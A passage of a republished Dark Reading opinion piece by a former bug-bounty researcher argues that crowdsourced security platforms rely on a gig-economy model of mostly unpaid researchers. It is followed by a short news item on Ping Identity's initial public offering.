You see, pen testers (or anyone with an offensive security skill set) are hard to find on the job market because, yes, there’s a shortage and, yes, it’s getting worse. Once you recruit them, you have to pay them top dollar so they stay, and you also have to keep them happy by sending them to conferences and allow them time to do their own research and attend certification courses (for which you’ll also pay). On top of that, you have to pay them traditional benefits such as a pension, a regular salary, etc. And since you’re sending them to various customer sites, you obviously need to pay for transportation expenses. While you employ them, you also have to make the best use of them, billing them out at $1,000 a day (or more!) so you can make some money off them. Not having them working on client engagements is very expensive because they’re sitting around doing nothing.

Crowdsourced companies have leapfrogged these complications in a spectacular fashion by just removing that from the equation entirely. Your “employees” can be anywhere in the world, and as long as they are given an incentive to participate in bounties, even if they aren’t paid unless they find something, then you’ve just made your business leaner. You don’t need to pay for their certifications, tools, upkeep, pensions, or any of the costs that are associated with full-time employees. You pay them per vulnerability, so it’s irrelevant how many there are. You don’t need office space to contend with nor worry about even reviewing their performance because it’s a self-fulfilling cycle — those that perform better get paid more, so are invited to more bounties, then get paid even more and so the cycle continues.

A Nice Job if You Can Get It
But who would actually sign up for this? Thousands, in fact. First of all, there aren’t that many people working in this fashion. Forget the marketing statistics you hear — crowdsourced companies may claim anywhere from 150,000 to 300,000 people on their platform, but all they’re doing is counting the number of sign-ups. When you drill down into the statistics, only a tiny percentage of those people have ever logged a vulnerability.

Most people on these platforms (such as myself), according to Bugcrowd’s “2019 Inside the Mind of a Hacker” report, don’t do it full time, especially if they live in Europe or the US. Salaries in the cybersecurity sector are high enough that most people don’t have to moonlight for extra money, which is why, without exception, all the researchers I speak to do it for fun, the challenge, or just the safety net of being able to hunt for bugs in applications without the threat of legal action.

To be fair, crowdsourced companies are acutely aware of this criticism and are slowly trying to address this issue. Synack launched Missions a year ago, which are short, focused tests for a single vulnerability, whereby if you find the vulnerability or not, you’ll get paid. Bugcrowd also has launched its Next Gen Pen Test, which follows a similar vein: If you flow through a testing methodology but don’t find anything, you’ll get a lump sum; if you find vulnerabilities, then you get paid for those, too.

Work Still Needed
Arguably, companies in the industry still have a lot of work to do. While they have teams internally dedicated to “researcher success,” these are customer focused. I’ve lost count of the number of times I’ve had a company not pay out (either by ignorance or on purpose), ignore a vulnerability, or just generally misclassify the severity of something I found to pay less. The one exception to this is Synack, which has solved this issue by having a slightly different business model: It consistently pays out from its own funds and negotiates with companies separately. This is also the reason it has the reputation for having the fastest payouts in the crowdsourced industry. Based on my personal experience, often you can be looking at money in the bank 48 hours after submitting a vulnerability.

It’s hard to see this continuing into the future — bug bounties and disclosure platforms aren’t new anymore, and it’s telling that the researchers you find on one platform are identical to the other platforms because, simply put, those with a desire to do so now participate in bug bounties, resulting in a never-ending stream of researchers to pull from. This is problematic because the entire business model depends on two things: a continuous stream of people looking for vulnerabilities and having those people do it mostly for free.

As a result, platforms have had to switch tactics. Cycling researchers is common. For example, if you have 30 researchers assigned to a private bounty program, and 20 of those haven’t logged a single vulnerability in a few months, it’s fair to say they aren’t looking anyway, so you cycle them out and invite 20 new people in to replace them. This is to generate that constant flow of researchers with a different set of eyeballs that might spot something the others haven’t. (This is one of the primary advantages of crowdsourced security over pen testing, so it makes complete sense).

The other technique is gamification. Payments are increased for certain companies, and this is communicated out to everyone to rekindle interest with the introduction of badges, achievements, T-shirts, and all sorts of goodies as rewards for meeting certain targets or types of vulnerabilities. Techniques like this will work in the short term but will eventually come up against the same long-term boundaries because there just isn’t an infinite supply of highly skilled specialist labor that works for free.

Related Content:

Check out The Edge, Dark Reading’s new section for features, threat data, and in-depth perspectives. Today’s top story: “The 20 Worst Metrics in Cybersecurity “

Alex Haynes is a former pentester with a background in offensive security and is credited for discovering vulnerabilities in products by Microsoft, Adobe, Pinterest, Amazon Web Services and IBM. He is a former top 10 ranked researcher on Bugcrowd and a member of the Synack … View Full Bio

Article source: https://www.darkreading.com/risk-management/crowdsourced-security-and-the-gig-economy/a/d-id/1335800?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

Ping Identity Prices IPO at $15 per Share

The identity management company plans to sell 12.5 million shares, raising $187.5 million in its initial public offering.

Identity management company Ping Identity today announced its initial public offering of 12.5 million shares of common stock at a public price of $15 per share, raising $187.5 million in its IPO. The firm is scheduled to start trading on the NYSE today under the ticker symbol “PING.”

Denver-based Ping Identity was founded in 2002; since then, it has generated $128.3 million over nine rounds of funding. The organization was acquired in 2016 by Vista Equity Partners for a price of $600 million, CrunchBase reports. With shares priced this week at $15 each, Ping Identity is now valued around $1.16 billion — nearly double what Vista Equity paid for it.

Lead book-running managers for the proposed offering include Goldman Sachs, Bank of America Merrill Lynch, RBC Capital Markets, and Citigroup. Ping Identity has granted underwriters a 30-day option to buy up to 1.87 million additional shares of common stock.

The offering is expected to close on September 23, 2019, subject to customary closing conditions.

Read more details here.

Check out The Edge, Dark Reading’s new section for features, threat data, and in-depth perspectives. Today’s top story: “The 20 Worst Metrics in Cybersecurity.”

Dark Reading’s Quick Hits delivers a brief synopsis and summary of the significance of breaking news events. For more information from the original source of the news item, please follow the link provided in this article. View Full Bio

Article source: https://www.darkreading.com/cloud/ping-identity-prices-ipo-at-$15-per-share/d/d-id/1335858?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple